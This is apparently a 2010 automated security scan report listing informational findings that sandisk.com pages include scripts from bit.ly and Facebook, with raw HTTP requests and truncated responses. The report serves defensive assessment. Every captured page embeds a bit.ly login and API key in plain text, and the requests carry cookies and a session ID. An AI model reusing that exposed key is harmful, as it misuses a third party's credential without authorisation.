<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.48. http://www.sandisk.com/about-sandisk/media-kit/miscellaneous  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/miscellaneous

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-sandisk/media-kit/miscellaneous HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15491
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.49. http://www.sandisk.com/about-sandisk/media-kit/oem-product-photos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/oem-product-photos

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/media-kit/oem-product-photos HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26475
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.50. http://www.sandisk.com/about-sandisk/media-kit/retail-product-photos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/retail-product-photos

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/media-kit/retail-product-photos HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42995
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.51. http://www.sandisk.com/about-sandisk/media-kit/retail-product-photos/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/retail-product-photos/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/media-kit/retail-product-photos/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42996
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.52. http://www.sandisk.com/about-sandisk/media-kit/retail-product-photos/dslr/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/retail-product-photos/dslr/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-sandisk/media-kit/retail-product-photos/dslr/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23167
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.53. http://www.sandisk.com/about-sandisk/media-kit/retail-product-photos/dslr/sandisk-extreme-pro-compactflash-card.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/retail-product-photos/dslr/sandisk-extreme-pro-compactflash-card.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-sandisk/media-kit/retail-product-photos/dslr/sandisk-extreme-pro-compactflash-card.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/press-room
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17531
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.54. http://www.sandisk.com/about-sandisk/media-kit/retail-products-brochures  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/retail-products-brochures

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-sandisk/media-kit/retail-products-brochures HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 53527
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.55. http://www.sandisk.com/about-sandisk/media-kit/trademark-information  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/trademark-information

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/media-kit/trademark-information HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21811
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.56. http://www.sandisk.com/about-sandisk/press-room  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/press-room

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/press-room HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43181
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div class="floatLeft">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.57. http://www.sandisk.com/about-sandisk/press-room/press-contacts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/press-room/press-contacts

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/press-room/press-contacts HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/press-room
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32351
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="contentRight">

   
   <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.58. http://www.sandisk.com/about-sandisk/press-room/press-releases  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/press-room/press-releases

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-sandisk/press-room/press-releases HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49376
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.59. http://www.sandisk.com/about-sandisk/press-room/press-releases/2009/2009-09-14-sandisk-extreme-pro-compactflash-memory-card-raises-bar-for-professional-grade-performance,-capacity-and-reliability  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/press-room/press-releases/2009/2009-09-14-sandisk-extreme-pro-compactflash-memory-card-raises-bar-for-professional-grade-performance,-capacity-and-reliability

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-sandisk/press-room/press-releases/2009/2009-09-14-sandisk-extreme-pro-compactflash-memory-card-raises-bar-for-professional-grade-performance,-capacity-and-reliability HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/press-room
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24124
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.60. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-10-08-sandisk-schedules-third-quarter-2010-conference-call  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/press-room/press-releases/2010/2010-10-08-sandisk-schedules-third-quarter-2010-conference-call

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-sandisk/press-room/press-releases/2010/2010-10-08-sandisk-schedules-third-quarter-2010-conference-call HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/press-room
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14419
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.61. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-10-21-sandisk-announces-third-quarter-2010-financial-results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/press-room/press-releases/2010/2010-10-21-sandisk-announces-third-quarter-2010-financial-results

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-sandisk/press-room/press-releases/2010/2010-10-21-sandisk-announces-third-quarter-2010-financial-results HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24491
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.62. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-04-sandisk-to-celebrate-15-years-on-the-nasdaq-with--opening-bell-ceremony  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/press-room/press-releases/2010/2010-11-04-sandisk-to-celebrate-15-years-on-the-nasdaq-with--opening-bell-ceremony

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-sandisk/press-room/press-releases/2010/2010-11-04-sandisk-to-celebrate-15-years-on-the-nasdaq-with--opening-bell-ceremony HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18412
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.63. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-worldâ??s-smallest-64gb-solid-state-drive  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world........s-smallest-64gb-solid-state-drive

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world........s-smallest-64gb-solid-state-drive HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12745


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.64. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-worldã¢â??¬â??¢s-smallest-64gb-solid-state-drive  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world..................s-smallest-64gb-solid-state-drive

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world..................s-smallest-64gb-solid-state-drive HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:41:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12765


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.65. http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-worldã£â¢ã¢â?šâ¬ã¢â?žâ¢s-smallest-64gb-solid-state-drive  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world......................................s-smallest-64gb-solid-state-drive

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world......................................s-smallest-64gb-solid-state-drive HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12805


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
